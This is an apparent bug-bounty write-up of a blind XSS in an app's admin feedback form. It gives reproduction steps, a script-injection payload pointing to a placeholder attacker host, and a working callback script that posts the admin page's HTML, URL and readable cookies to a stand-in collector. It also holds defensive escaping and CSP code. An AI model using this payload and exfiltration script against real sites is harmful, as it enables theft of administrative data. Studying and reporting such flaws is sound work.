Blind XSS Execution From Feedback Form (Finding Can give you $1000+ Bounty)

ShuttlerTech
2 min read · Feb 23, 2023


Hello, Hunters. I know you are here because you are struggling or want to advance in your career. Believe me, things take time. Be consistent, continue to learn, and never deceive yourself. If you follow these three mantras, you will undoubtedly achieve success.

Description:

I discovered the blind XSS in the admin area. On the installation screen for the default theme, I was attempting to add widgets. After the installation completed, I saw a prompt like this: "Are you satisfied with how everything looks?" When I selected the button that read "No, please remove all widgets", a comment form appeared. I submitted my blind XSS payload in that form. It fired 10 to 15 minutes later on https://xyz.me/admin, which requires HTTP Basic Authorization. I could collect all of the admin pages, but I could not obtain the admin session cookie.

Steps to Reproduce:
1. Open https://odo-tester.xyz.com/admin and sign in with the test credentials (listed under Credentials Used below).

2. Click the Apps tab from the left side and then click Judge.me Product Reviews.

3. Click Add Widgets then Start Installation and continue.

4. When the installation is done, it asks "Are you happy with how everything looks?". Choose the "No, please remove all widgets" button. A feedback form appears; enter your blind XSS payload there.

5. Wait for the payload to execute.
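Step 5 is where the blind part happens: the payload loads a script from the attacker-controlled host, and only that script's callback tells you the payload fired, where, and in what context. The following is an added example, not the author's code or the target's, of what such a callback script can do. It gathers what the author reports recovering (the rendered admin page) together with the page URL, referrer and any cookie readable by script, and posts it to a collector. The host `yourxssdomain` and the `/collect` endpoint are placeholders, and the explanation for the missing session cookie (an HttpOnly flag hides it from `document.cookie`) is an assumption about this target.

```javascript
// Added example (not the author's code): the probe script a blind-XSS payload such as
// "><script src=https://yourxssdomain></script> would load from the attacker host.
// Collector URL and host are placeholders; the HttpOnly explanation is an assumption.

// Build the report from a window-like object. Taking `win` as a parameter instead of
// touching the global `window` keeps the function testable outside a browser.
function collectBlindXssReport(win) {
  const doc = win.document;
  const cookie = doc.cookie || '';
  return {
    url: String(win.location.href),
    referrer: doc.referrer || '',
    // HttpOnly cookies are never exposed to script, so an empty string here does not
    // mean the victim had no session; it is the likely reason the author saw no cookie.
    cookie: cookie,
    cookieReadable: cookie.length > 0,
    userAgent: win.navigator ? win.navigator.userAgent : '',
    // The full DOM is the most useful artifact when cookies are hidden: it proves
    // execution in the admin context and shows exactly what the admin sees.
    html: doc.documentElement ? doc.documentElement.outerHTML : '',
    firedAt: new Date().toISOString(),
  };
}

// POST the report. `fetchImpl` is injectable for the same reason; in a browser pass
// window.fetch. `keepalive` lets the request finish if the admin navigates away,
// and a text/plain body avoids a CORS preflight that the collector may not answer.
async function sendBlindXssReport(report, collectorUrl, fetchImpl) {
  return fetchImpl(collectorUrl, {
    method: 'POST',
    mode: 'no-cors',
    keepalive: true,
    headers: { 'Content-Type': 'text/plain' },
    body: JSON.stringify(report),
  });
}

// Entry point used when this file is served from https://yourxssdomain (placeholder).
if (typeof window !== 'undefined' && typeof document !== 'undefined') {
  sendBlindXssReport(collectBlindXssReport(window),
                     'https://yourxssdomain/collect', window.fetch.bind(window))
    .catch(() => {});
}
```

The collector only needs to store the body and the source IP; the `referrer` and `url` fields are what tell you the payload fired under `/admin` rather than on a public page, which is the difference between a low and a high severity report.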

Supporting References:

Vulnerable Page URL: https://xyz.me/admin/████████
Referer: https://xyz.me/admin/███

Cookies: http ██████████████

Credentials Used:

  1. email: ██████████@techmail.com
  2. password: ███████
  3. tempmail: https://yopmail.com/?judgeme-███████████ (may be needed when logging in)
  4. payload: "><script src=https://yourxssdomain></script>

Impact:

The blind XSS reaches the admin area. It may expose information about other store owners' reports. Arbitrary JavaScript runs in the admin interface, which allows actions as the admin and theft of any administrative cookies that script can read.
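The impact follows from one missing step on the server: the stored feedback is written into the admin page without HTML encoding. The leading `">` in the payload is the tell that the comment lands inside a quoted attribute, which the `"` closes before `>` ends the tag. The following is an added example, not the target's code, that models that sink in Node.js, shows the vulnerable and the encoded rendering side by side, and adds a simple Content-Security-Policy check. The attribute template and the CSP value are assumptions chosen to match the payload; the CSP matcher is deliberately simplified (no wildcard-host or nonce handling).

```javascript
// Added example (not the target's code): why the stored comment fires in the admin
// page, and the two controls that stop it. Template and CSP are assumptions.

const PAYLOAD = '"><script src=https://yourxssdomain></script>';

// Vulnerable: the stored comment is concatenated straight into a value="" attribute.
function renderFeedbackUnsafe(comment) {
  return '<input type="text" value="' + comment + '">';
}

// Encode the five characters that change parsing in text and attribute context.
// The double quote matters here because the sink is a quoted attribute.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Hardened: same template, comment encoded before insertion.
function renderFeedbackSafe(comment) {
  return '<input type="text" value="' + escapeHtml(comment) + '">';
}

// Crude check usable in a unit test or a stored-XSS scan: does the rendered markup
// contain a script start tag? In the encoded output the brackets are entities, so no
// element is created and nothing executes.
function containsScriptElement(html) {
  return /<script\b/i.test(html);
}

// Defence in depth for the admin area: with script-src limited to 'self' the browser
// refuses to fetch the remote script even if encoding is missed somewhere.
const ADMIN_CSP = "default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'none'";

// Simplified policy check: script-src governs scripts, falling back to default-src.
// Only exact origins and the bare '*' wildcard are matched.
function cspAllowsScriptFrom(csp, origin) {
  const directives = csp.split(';').map(d => d.trim().split(/\s+/)).filter(d => d[0]);
  const find = name => directives.find(d => d[0] === name);
  const d = find('script-src') || find('default-src');
  if (!d) return true;
  return d.slice(1).some(src => src === origin || src === '*');
}
```

For a real fix use the template engine's auto-escaping rather than a hand-written `escapeHtml`, and treat the CSP as a second layer, not a replacement for encoding: `'unsafe-inline'` or an over-broad `script-src` silently reopens the hole.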

Thank you for reading! I hope you learned a few tricks.

Subscribe to the Shuttlertech YouTube channel for more content of this type and to watch live POCs. To advance your career, connect with me 1:1 on topmate.
I assure you that I will write more interesting, knowledge-sharing writeups. To encourage me, follow me on Medium and click the clap icon.

Disclaimer: My writeups come from my own findings and sometimes from different learning platforms. Do not use this methodology without the consent of the company. I am sharing this for learning purposes only.


Written by ShuttlerTech

Senior Cyber Security Analyst | YouTuber | Freelancer | Cyber Security Trainer | Penetration Tester | Cyber Forensics Investigator
